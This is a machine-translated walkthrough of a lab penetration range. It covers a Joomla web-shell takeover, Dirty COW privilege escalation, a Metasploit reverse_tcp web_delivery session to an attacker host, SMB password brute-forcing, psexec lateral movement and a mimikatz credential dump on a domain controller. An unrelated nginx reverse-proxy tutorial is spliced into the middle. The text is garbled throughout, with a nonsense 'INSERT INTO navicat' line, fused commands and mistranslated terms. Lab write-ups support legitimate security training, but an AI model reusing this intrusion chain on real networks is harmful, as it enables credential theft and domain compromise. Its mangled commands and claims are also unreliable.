preface

This environment is a black box test. Perform the black box test without providing the VM account password to obtain the flag on the domain controller.

Environment set up

Attack:

Kali: 192.168.1.10

Range:

CentOS(inside) : 192.168.93.100

CentOS(external) : 192.168.1.110

Ubuntu: 192.168.93.120

Hosts in the domain:

Winserver2012:192.168.93.10

Winserver2008:192.168.93.20

Windows 7:192.168.93.30

The kali can ping CentOS. Procedure

The topology is as follows:

Intranet Information Collection

Nmap Probe port

Nmap first detects the port status of the outgoing network machine (CentOS). It can be seen that ports 22, 80 and 3306 are opened. It is preliminatively determined that Web and SSH are opened, and the database should be MySQL

Nmap-t4-sc-sv 192.168.1.110Copy the code

Joomla framework has a remote RCE vulnerability in 3.4.6 and later versions. Here we use exp to directly hit it

Exp can not be used in the past, so joomla’s version is higher

Here use the port scanning software to scan the background files to find an administrator interface

This is the background login interface of Joomla. Here I tried to use bp weak password, but I had to give up

A further scan using dirSearch found a configuration. PHP

Look at the content of PHP and find that there is a user and password, think of the port 3306 opened, guess this may be the administrator backup database password forgot to delete

Connect the mysql

Here use Navicat to try to connect to the target drone database

You can see that the connection is successful

Then it is to search the data for the administrator account, looking for the administrator account must be found with the user field and password field, here I find for a period of time, finally found that the umNBT_users table is the most similar to the administrator account, but there is a problem, I found that the password of the password place is not plain text

Here we tried to decrypt the cipher text and found that the decryption failed

During the search, I found that although joomla’s official website does not directly disclose the password encryption method, it adds a way to add a super administrator user in order to prevent users from forgetting their passwords, that is, to log in to the database and execute SQL statements to achieve the effect of creating a super administrator

Here we can find that the third item in VALUES in the SQL statement is the ciphertext. Here we use the string of ciphertext given by the SQL statement for convenience, and the corresponding password is secret. Of course, we can also use other corresponding ciphertext as shown below

INSERT INTO navicat; INSERT INTO navicat; INSERT INTO navicat

Log in to the Joomla background

Use Admin2 secret to log in to the Joomla background

Log in successfully, after entering the background operation is generally to find a place to upload files upload picture horse or find a place to write SQL statements

After a quick Google search, joomla has a Template editor in the background where you can write files. Extensions->Template->Templates are available

Select the Beez3 template to edit

Here because the template has a

Use ant sword to connect successfully here

Bypass disable_functions

In Windows, there are few methods to bypass disable_functions, but in Linux, there are many methods to bypass disable_functions. I won’t go into it here

Here for convenience, I directly use the built-in plug-in in ant Sword to bypass disable_functions. You can see that the script operation has been uploaded successfully

Here I directly connect to the uploaded.antproxy.php. In theory, I should connect to the original password to execute the command, but I don’t know why the return data is empty.

Here we have to use the most original method, upload a py bypassing disable_functions, and execute system commands by passing parameters

Test passing the parameter whoami, and you can see that this is a low-privilege www-data

Ifconfig look at the network card situation, here is very strange, because before we scan the CentOS IP should be 192.168.1.0/24 network segment, but here ifconfig out is 192.168.53.0/24 network segment, to tell the truth a little confused

Arp-a Check the routing table and find that the network segment is 192.168.93.0/24

If you look at the incoming and outgoing ports, you can find that they are all on network segment 93

The static network adapter configured in interfaces is also on network segment 93

Nginx reverse proxy

The network segment of the previous Linux is equivalent to a public IP address, but the real host should be 192.168.93.0/24, but this is an internal network segment, so the nginx reverse proxy is the most suitable for this situation

Because nGINx before the case of the inverse generation has not been met, so here by the way to add their own blind area

What is the agent

In The Java design pattern, the proxy pattern is defined by providing a proxy object to an object and allowing the proxy object to control the reference to the original object.

You may not understand this, but here’s an example from real life: We want to buy a second-hand housing, for example, although we can go to our house, but it is too spend time and effort, and the series of procedures such as house quality testing and transfer also have we to do, say now this society, we find houses, such as house might have appreciated and then how to do? The simplest and fast method looks for secondhand room intermediary company namely (why? There are plenty of other people there), so we entrust the intermediary company to find me the right house, and the follow-up quality inspection transfer and other operations, we just need to choose the house they want, and then pay the money.

An agency simply means that if we want to do something, but we don’t want to do it directly, then we find another person to do it for us. So the intermediary company in this example is to do agency services for us, we entrust the intermediary company to help us find a house.

What is reverse proxy

The difference between a reverse proxy and a forward proxy is that the forward proxy is a proxy client and the reverse proxy is a proxy server.

Reverse proxy, in fact, the client’s agent is no perception, because the client does not require any configuration can access, we only need to send the request to the reverse proxy server, the reverse proxy server to select the target server to get data, returned to the client, the reverse proxy server and the target server is a server, The proxy server address is exposed, but the real server IP address is hidden.

Benefits of reverse proxies

So why use the reverse proxy, the reasons are as follows:

1, protect the real Web server, the Web server is invisible to the external network, the external network can only see the reverse proxy server, and there is no real data on the reverse proxy server, therefore, to ensure the security of the Web server resources

2. The reverse proxy is based on the separation of static and dynamic resources and load balancing, which reduces the burden of web servers and speeds up the website access speed (the separation of static and dynamic resources and load balancing will be discussed later).

3. Saves limited IP address resources. All websites in the enterprise share an IP address registered on the Internet

After understanding the reverse proxy, we will explore the implementation of the Nginx reverse proxy in detail

1. Simulate n HTTP servers as target hosts for the test. Simply use two Tomcat instances to simulate two HTTP servers, and change the Tomcat ports to 8081 and 8082 respectively

2. Configure the IP domain name

192.168.72.49 192.168.72.49 max.com max.com 8082. 8081.Copy the code

3. Configure nginx.conf

Upstream tomcatserver1 {server 192.168.72.49:8081; } upstream tomcatserver2 {server 192.168.72.49:8082; } server { listen 80; server_name 8081.max.com; #charset koi8-r; #access_log logs/host.access.log main; location / { proxy_pass http://tomcatserver1; index index.html index.htm; } } server { listen 80; server_name 8082.max.com; #charset koi8-r; #access_log logs/host.access.log main; location / { proxy_pass http://tomcatserver2; index index.html index.htm; }}Copy the code

Process: 2) Nginx reverse proxy accepts client requests and finds server node with server_name = 8081.max.com. 3) Nginx reverse proxy accepts client requests and finds server node with server_name = 8081.max.com The request is forwarded to upstream tomcatServer1 (tomcatserver port 8081) based on the HTTP path corresponding to proxy_pass.

So there’s obviously a Linux host that’s acting as a reverse proxy host for Ubuntu on the Intranet in the topology, so I’m looking through the cache folder and I find a mysql folder, so I’m going to check it out

Found a test.txt, is not another administrator forgot to delete the account password? (manual dog head)

Since port 22 was opened when we scanned the port before, this account password is likely to be the SSH account password

SSH connection attempt

The connection to another Linux host succeeded

Looking at the host and IP, we can find that this host is not the Previous Ubuntu, but CentOS. Moreover, it has two nics. One nic is the IP address of the network segment of 1.0/24 that we obtained in the previous scan, and the other IP address is the IP address of the internal network segment of 93.0/24. This Linux host is undoubtedly the Reverse proxy host for Ubuntu

Dirty bull power

Here directly choose Linux to pick the preferred dirty cow to carry out the right

C./dirty 123456 // Create a high permission user whose password is 123456Copy the code

As you can see, this has been successfully executed. After successful execution, dirty Cow will automatically generate a high-privilege user named Firefart with the password we just set 123456

Here we switch to a Firefart user to take a look

Network infiltration

Centos online MSF

It is the payload of a Linux payload. The payload is sent to MSF as the payload of a Linux payload

Use exploit/multi/script/web_delivery set lhost 192.168.1.10 set lport 4444 set target 7 runCopy the code

When it runs, it gives you a payload

Use exploits/multi/script/web_delivery set target 7 set payload Linux/x64 / meterpreter/reverse_tcp set lhost 192.168.1.10 set lport 4444 exploitCopy the code

Copy payload to centos for execution

You can see that the bounce session has succeeded

The SOCKS proxy enters the Intranet scanning

Add a route and use the socks_proxy module to access the Intranet

Route add 192.168.93.0 255.255.255.0 1 Route print Use auxiliary/server/socks_proxy set version 4a runCopy the code

Add the proxy IP and port to /etc/proxychain-. conf

Proxychain + nmap can be used for scanning here. For convenience, I directly use the module in MSF to scan the network segment 192.168.93.0/24. Note here in the actual combat time can be appropriate to reduce the thread a little, otherwise the flow will be very large, here because of the reason of the shooting range I will directly adjust to 20

The use of auxiliary/scanner/discovery/udp_probe set rhosts 192.168.93.1-255 set threads run 20Copy the code

After the scan, you can find that three hosts live on the Intranet, namely 192.168.93.10 192.168.93.20 192.168.93.30

But that’s not enough information at this point, so nmap is called to continue scanning for details

Nmap-t4-sc-sv 192.168.93.10 192.168.93.20 192.168.93.30Copy the code

The first is the host 10. You can see that ports 88 and 389 have been opened. Any master familiar with these two ports should know that these two ports are highly likely to lock this host, which is the domain controller

Host 20 has several normal ports on it, and it is worth noting that port 1433 means that host 20 has MSSQL service

30 Compared with the previous two hosts, this host has no characteristic ports. Should it be a common domain member host

Eternal blue try

Here I found that the three hosts have opened ports 139 and 445, so first use eternalblue module to batch scan to see if there are any hosts that can be directly shot down with Eternalblue

Here there is no direct use of eternal blue down the host, Win7 and 2008 anonymous pipeline are not open so the use of not

Password enumeration

Because all three hosts have port 445 on, you can use SMB to try the password enumeration using the SMb_login module in MSF

Use auxiliary/scanner/SMB/SMB \ _loginset rhosts 192.168.93.20 set SMBUser Administratorset PASS \ _FILE/TMP / 1 w. txtrunCopy the code

Lucky here, the password is 123qwe! ASD happens to be in my 1W.txt dictionary

Psexec moves horizontally

Use the proxifier to proxy the MSF socks to the local server.

Now that you have obtained the administrator password, use IPC to connect to host 20 and use copy command to copy MimiKatz to host 20

Then use Psexec to get a CMD environment, use MimiKatz to grab the hash and save it as a log

Psexec64. exe \\192.168.93.20 cmdMimiKats. exe log privilege::debug sekurLsa :: logonPasswordsCopy the code

Type mimikatch. log After the log is read, the domain management account password is Administrator zxcASDqw123!!

Then use IPC connection to directly connect to host 10, that is, the domain controller of the TEST domain. You can see that the connection is successful

Use commands to view confidential files

Dir \ \ \ 192.168.93.10 $\ \ C \ \ users \ \ Administrator \ \ Documentstype \ \ \ 192.168.93.10 \ \ C $\ \ users \ \ Administrator \ \ Documents \ \ flag. TXTCopy the code

Code word is not easy, if you think this article useful words, please give me a key three! Follow the author, there will be more dry goods to share, please continue to pay attention!